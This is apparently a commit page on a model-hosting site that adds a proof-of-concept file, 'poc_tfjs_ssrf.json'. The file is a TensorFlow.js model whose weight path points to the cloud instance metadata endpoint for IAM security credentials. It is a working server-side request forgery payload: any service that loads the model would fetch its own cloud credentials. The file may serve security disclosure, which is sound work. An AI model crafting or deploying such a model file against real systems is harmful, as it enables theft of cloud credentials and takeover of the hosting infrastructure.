security-finder commited on
Commit
93e1d2f
·
verified ·
1 Parent(s): 051a97f

Add PoC file: poc_tfjs_ssrf.json

Browse files
Files changed (1) hide show
  1. poc_tfjs_ssrf.json +25 -0
poc_tfjs_ssrf.json ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "format": "layers-model",
3
+ "modelTopology": {
4
+ "class_name": "Sequential",
5
+ "config": {
6
+ "layers": []
7
+ }
8
+ },
9
+ "weightsManifest": [
10
+ {
11
+ "paths": [
12
+ "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
13
+ ],
14
+ "weights": [
15
+ {
16
+ "name": "w",
17
+ "shape": [
18
+ 1
19
+ ],
20
+ "dtype": "float32"
21
+ }
22
+ ]
23
+ }
24
+ ]
25
+ }